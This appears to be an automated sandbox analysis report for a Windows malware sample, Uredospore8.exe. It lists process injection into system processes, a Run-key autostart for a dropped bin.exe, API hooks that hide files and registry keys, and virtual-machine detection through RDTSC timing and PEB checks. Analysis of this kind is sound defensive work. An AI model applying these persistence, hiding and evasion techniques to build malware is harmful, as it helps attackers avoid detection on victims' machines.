Source: C:\Windows\explorer.exe	Code function: 4_2_00F80C37 push edi; ret	4_2_00F80C73
Source: C:\Windows\explorer.exe	Code function: 4_2_00F80BA6 push edi; ret	4_2_00F80C73
Source: C:\Windows\explorer.exe	Code function: 4_2_02DF0C37 push edi; ret	4_2_02DF0C73
Source: C:\Windows\explorer.exe	Code function: 4_2_02DF0BA6 push edi; ret	4_2_02DF0C73
Source: C:\Windows\System32\sihost.exe	Code function: 5_2_00D00C37 push edi; ret	5_2_00D00C73
Source: C:\Windows\System32\sihost.exe	Code function: 5_2_00D00BA6 push edi; ret	5_2_00D00C73
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_00F00C37 push edi; ret	6_2_00F00C73
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_00F00BA6 push edi; ret	6_2_00F00C73
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00190C37 push edi; ret	7_2_00190C73
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00190BA6 push edi; ret	7_2_00190C73
Source: C:\Windows\System32\ctfmon.exe	Code function: 8_2_009E0C37 push edi; ret	8_2_009E0C73
Source: C:\Windows\System32\ctfmon.exe	Code function: 8_2_009E0BA6 push edi; ret	8_2_009E0C73
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_00840C37 push edi; ret	9_2_00840C73
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_00840BA6 push edi; ret	9_2_00840C73
Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	Code function: 10_2_00EE0C37 push edi; ret	10_2_00EE0C73
Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	Code function: 10_2_00EE0BA6 push edi; ret	10_2_00EE0C73
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 11_2_00A40C37 push edi; ret	11_2_00A40C73
Source: C:\Windows\System32\RuntimeBroker.exe	Code function: 11_2_00A40BA6 push edi; ret	11_2_00A40C73

Source: Uredospore8.exe	Static PE information: section name: .text entropy: 6.821035285186627
Source: bin.exe.3.dr	Static PE information: section name: .text entropy: 6.821035285186627

Source: C:\Windows\SysWOW64\winver.exe

File created: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe

Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Windows\SysWOW64\winver.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run E6B93DA9

Jump to behavior

Monitors registry run keys for changes

Source: C:\Windows\System32\ctfmon.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Source: C:\Windows\SysWOW64\winver.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run E6B93DA9			Jump to behavior
Source: C:\Windows\SysWOW64\winver.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run E6B93DA9			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwResumeThread new code: 0xE9 0x9E 0xE1 0x12 0x25 0x51

Source: C:\Users\user\Desktop\Uredospore8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Uredospore8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Uredospore8.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Windows\System32\dllhost.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep	graph_15-2377
Source: C:\Windows\System32\svchost.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep	graph_6-2344
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Users\user\Desktop\Uredospore8.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep	graph_2-3528
Source: C:\Windows\System32\conhost.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Windows\System32\RuntimeBroker.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep	graph_11-2442
Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep
Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep	graph_10-2344
Source: C:\Windows\explorer.exe	Evasive API call chain: GetPEB, DecisionNodes, Sleep	graph_4-4867

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\winver.exe

API/Special instruction interceptor: Address: 7FFDB442E814

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\SysWOW64\winver.exe

RDTSC instruction interceptor: First address: D430A9 second address: D430D2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 stosd 0x00000005 mov eax, dword ptr [ebx+004043BDh] 0x0000000b stosd 0x0000000c mov eax, dword ptr [ebx+004043C1h] 0x00000012 stosd 0x00000013 mov eax, dword ptr [ebx+004069C0h] 0x00000019 stosd 0x0000001a mov eax, dword ptr [ebx+004069C4h] 0x00000020 stosd 0x00000021 lea eax, dword ptr [ebp-00000700h] 0x00000027 sub edi, eax 0x00000029 rdtsc

Source: C:\Users\user\Desktop\Uredospore8.exe

Code function: 2_2_006D0849 rdtsc

2_2_006D0849

Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 786			Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 757			Jump to behavior

Source: C:\Users\user\Desktop\Uredospore8.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep			graph_2-3543
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\Desktop\Uredospore8.exe	API coverage: 9.6 %
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	API coverage: 4.9 %

Source: C:\Windows\System32\dllhost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\SysWOW64\winver.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\winver.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\ctfmon.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	Last function: Thread delayed
Source: C:\Windows\System32\RuntimeBroker.exe	Last function: Thread delayed
Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe	Last function: Thread delayed
Source: C:\Windows\System32\dllhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\RuntimeBroker.exe	Last function: Thread delayed
Source: C:\Windows\System32\RuntimeBroker.exe	Last function: Thread delayed
Source: C:\Windows\System32\smartscreen.exe	Last function: Thread delayed
Source: C:\Windows\System32\ApplicationFrameHost.exe	Last function: Thread delayed
Source: C:\Windows\System32\RuntimeBroker.exe	Last function: Thread delayed
Source: C:\Windows\System32\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\RuntimeBroker.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\piZjuUwknKzQTPjZNyoprYIvPKBgQzSfYLoVrxjkQiliRJUKSbTKtfmOoVFdNq\TbOpfOXygan.exe	Last function: Thread delayed

Source: explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: SearchApp.exe, 0000000D.00000000.2288200071.0000027A7E800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: com.squirrel.FACEITApp.FACEITcom.squirrel.Postman.PostmanVMware.Workstation.vmui
Source: explorer.exe, 00000004.00000000.2196219993.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: explorer.exe, 00000004.00000000.2192850877.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.3431957145.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000978C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3401335035.000001F69890B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000000.2222969318.000001F69890B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: SearchApp.exe, 0000000D.00000000.2306449484.0000027A80982000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: winver.exe, 00000003.00000002.3345685766.0000000000E28000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: SearchApp.exe, 0000000D.00000000.2288200071.0000027A7E800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware.View.Client
Source: explorer.exe, 00000004.00000000.2196219993.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: SearchApp.exe, 0000000D.00000003.2356316437.0000027A963CC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: qemu10642
Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware workstation 12 playerta cityy
Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware workstation 15 player12watchtower translation systemtsz
Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware horizon client\|vm ware8394
Source: SearchApp.exe, 0000000D.00000000.2284398647.0000027A7E2F2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: ?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: SearchApp.exe, 0000000D.00000003.2281551134.0000027A963DB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 5470\|hourly analysis program 4.50\|hap1\|hourly analysis program 4.80\|hap1\|hourly analysis program 4.90\|hap375\|hourly analysis program 4.91\|hap1\|hourly analysis program 5.01\|hap1\|hourly analysis program 5.10\|hap1\|hourly analysis program 5.11\|hap114\|hp scan\|scanner6717\|hp scan\|hpscan6355\|hp scan and capture\|hpscan6530\|hp smart\|hp printer5188\|hp smart\|hpsmart6013\|hp smart\|hp sca9057\|hp support assistant\|hp ass4184\|hp support assistant\|hps5179\|hp unified functional testing\|uft1\|hpe content manager\|trim1743\|hpe records manager\|trim1399\|hpe unified functional testing\|uft1\|huawei operation & maintenance system\|lmt1\|hulu\|huliu7717\|hulu\|hullu8132\|hulu\|huluu8464\|hulu\|huku5970\|hulu\|hule8326\|hulu\|julu8142\|hulu\|hlu6552\|hulu\|huu6329\|hwmonitor\|cpui5297\|hy-8 7.50\|hy81652\|hyper-v manager\|hyper v4919\|hyper-v manager\|virtual5441\|hyper-v manager\|hyperv4178\|hyper-v manager\|vm4595\|hyperspace\|epic708\|i.r.i.s. ocr registration\|iris1117\|ibm integration toolkit 10.0.0.10\|iib1\|ibm integration toolkit 10.0.0.11\|iib1\|ibm integration toolkit 10.0.0.12\|iib1\|ibm integration toolkit 10.0.0.13\|iib1\|ibm integration toolkit 10.0.0.15\|iib1\|ibm integration toolkit 10.0.0.7\|iib403\|ibm notes\|lotus2695\|ibm notes (basic)\|lotus3079\|ic business manager\|icb1577\|icloud\|i cloud5863\|icloud\|icould6247\|icloud\|iclu6932\|icloud photos\|pictures4048\|icloud photos\|i cloud5074\|icloud photos\|iphoto5036\|idle (python 3.7 32-bit)\|idel6028\|idle (python 3.7 64-bit)\|idel5996\|idle (python gui)\|python idle5336\|iheartradio\|i heart4638\|image composite editor\|ice852\|import passwords\|lastpass1242\|income tax planner\|bna1\|income tax planner workstation\|bna1\|inform\|ddi600\|information assistant\|ia1\|instagram\|instagra,10481\|instagram\|instagrm10522\|instagram\|instgram9142\|instagram\|instra10065\|instagram\|insat9464\|instagram\|insra10498\|instagram\|insts10256\|instagram\|isnta8095\|instagram\|inss10150\|instagram\|insy10074\|instagram\|ista9884\|instrument de decupare\|snipp3115\|intapp time\|dte2830\|integrated architecture builder\|iab1\|integrated dealer systems - g2\|ids1249\|integrated operations system\|ios1\|intel(r) extreme tuning utility\|xtu1972\|intellij idea community edition 2019.1.3\|inteli4762\|interaction administrator\|ia2559\|interactive ruby\|irb416\|interactive sql\|dbisql959\|internet download accelerator\|ida842\|internet download manager\|idman7834\|internet download manager\|idmm8541\|internet download manager\|intr7920\|internet download manager\|don8066\|internet download manager\|id,7596\|internet download manager\|idn6970\|internet download manager\|imd6996\|internet download manager\|ine9116\|internet download manager\|
Source: SearchApp.exe, 0000000D.00000000.2288256816.0000027A7E80D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe{6D809377-6AF0-444B-8957-A3773F02200E}\JetBrains\PhpStorm 2018.1.6\bin\phpstorm64.exe963
Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware workstation 12 player\|vmpl5459
Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|\|vmware6886
Source: SearchApp.exe, 0000000D.00000003.2299223713.0000027A98002000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281551134.0000027A963DB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281318447.0000027A96702000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|hyper-v manager\|vm4595
Source: SearchApp.exe, 0000000D.00000000.2288200071.0000027A7E800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware.Horizon.Client
Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware horizon client\|vmare7220
Source: RuntimeBroker.exe, 0000000B.00000002.3354827834.000002C8A4C58000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware horizon client
Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware workstation 15 player\|vmplayer6438
Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vlc media playere - insiderssrecord audio:wux:record audiovmware vsphere client
Source: svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: (@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
Source: SearchApp.exe, 0000000D.00000003.2299223713.0000027A98002000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2289266754.0000027A7E922000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281318447.0000027A96702000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|\|qemu10642
Source: SearchApp.exe, 0000000D.00000000.2306449484.0000027A80991000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2307269362.0000027A80A37000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2265953547.000002727CFAF000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2297626222.0000027A7EC2C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: SearchApp.exe, 0000000D.00000003.2356316437.0000027A963CC000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: /qemu10642
Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware workstation 12 player
Source: SearchApp.exe, 0000000D.00000003.2299223713.0000027A98002000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281551134.0000027A963DB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281318447.0000027A96702000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|hyper-v manager\|hyperv4178
Source: SearchApp.exe, 0000000D.00000000.2288200071.0000027A7E800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware.Workstation.vmui
Source: SearchApp.exe, 0000000D.00000003.2299223713.0000027A98002000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281551134.0000027A963DB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281318447.0000027A96702000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|hyper-v manager\|virtual5441
Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware workstation 15 player
Source: svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2263340509.00000272779A5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SearchApp.exe, 0000000D.00000000.2288200071.0000027A7E800000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware.Workstation.vmplayer
Source: explorer.exe, 00000004.00000000.2196219993.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;n
Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware vsphere client\|vspe6388
Source: SearchApp.exe, 0000000D.00000003.2299386010.0000027A980E2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: vmware vsphere client
Source: SearchApp.exe, 0000000D.00000000.2274880792.0000027A7D535000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2273444241.000002727D3A2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: del:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
Source: SearchApp.exe, 0000000D.00000000.2288256816.0000027A7E80D000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\VMware\VMware vCenter Converter Standalone\converter.exe
Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware horizon client\|vdi3894
Source: SearchApp.exe, 0000000D.00000003.2299223713.0000027A98002000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281551134.0000027A963DB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281318447.0000027A96702000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|hyper-v manager\|hyper v4919
Source: explorer.exe, 00000004.00000000.2195839667.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware horizon client\|view5503
Source: svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
Source: explorer.exe, 00000004.00000000.2192850877.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: explorer.exe, 00000004.00000000.2196219993.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: SearchApp.exe, 0000000D.00000003.2281394297.0000027A98002000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \|vmware vsphere client\|vcenter5038
Source: explorer.exe, 00000004.00000000.2192850877.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Users\user\Desktop\Uredospore8.exe	API call chain: ExitProcess graph end node			graph_2-3168
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\winver.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Uredospore8.exe

Code function: 2_2_006D0849 rdtsc

2_2_006D0849

Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_004030C1 mov eax, dword ptr fs:[00000030h]	0_2_004030C1
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_004030CD mov eax, dword ptr fs:[00000030h]	0_2_004030CD
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_007002AE mov eax, dword ptr fs:[00000030h]	0_2_007002AE
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_00700D34 mov eax, dword ptr fs:[00000030h]	0_2_00700D34
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 2_2_00401000 mov eax, dword ptr fs:[00000030h]	2_2_00401000
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 2_2_006D4071 mov edi, dword ptr fs:[00000030h]	2_2_006D4071
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 2_2_006D0CA4 mov eax, dword ptr fs:[00000030h]	2_2_006D0CA4
Source: C:\Windows\SysWOW64\winver.exe	Code function: 3_2_00D40C80 mov eax, dword ptr fs:[00000030h]	3_2_00D40C80
Source: C:\Windows\SysWOW64\winver.exe	Code function: 3_2_00D4404D mov edi, dword ptr fs:[00000030h]	3_2_00D4404D
Source: C:\Windows\explorer.exe	Code function: 4_2_00F80C80 mov eax, dword ptr fs:[00000030h]	4_2_00F80C80
Source: C:\Windows\explorer.exe	Code function: 4_2_00F8404D mov edi, dword ptr fs:[00000030h]	4_2_00F8404D
Source: C:\Windows\explorer.exe	Code function: 4_2_02DF0C80 mov eax, dword ptr fs:[00000030h]	4_2_02DF0C80
Source: C:\Windows\explorer.exe	Code function: 4_2_02DF404D mov edi, dword ptr fs:[00000030h]	4_2_02DF404D
Source: C:\Windows\System32\sihost.exe	Code function: 5_2_00D00C80 mov eax, dword ptr fs:[00000030h]	5_2_00D00C80
Source: C:\Windows\System32\sihost.exe	Code function: 5_2_00D0404D mov edi, dword ptr fs:[00000030h]	5_2_00D0404D
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_00F00C80 mov eax, dword ptr fs:[00000030h]	6_2_00F00C80
Source: C:\Windows\System32\svchost.exe	Code function: 6_2_00F0404D mov edi, dword ptr fs:[00000030h]	6_2_00F0404D
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_0019404D mov edi, dword ptr fs:[00000030h]	7_2_0019404D
Source: C:\Windows\System32\svchost.exe	Code function: 7_2_00190C80 mov eax, dword ptr fs:[00000030h]	7_2_00190C80
Source: C:\Windows\System32\ctfmon.exe	Code function: 8_2_009E0C80 mov eax, dword ptr fs:[00000030h]	8_2_009E0C80
Source: C:\Windows\System32\ctfmon.exe	Code function: 8_2_009E404D mov edi, dword ptr fs:[00000030h]	8_2_009E404D
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_00840C80 mov eax, dword ptr fs:[00000030h]	9_2_00840C80
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_0084404D mov edi, dword ptr fs:[00000030h]	9_2_0084404D
Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	Code function: 10_2_00EE0C80 mov eax, dword ptr fs:[00000030h]	10_2_00EE0C80
Source: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe	Code function: 10_2_00EE404D mov edi, dword ptr fs:[00000030h]	10_2_00EE404D
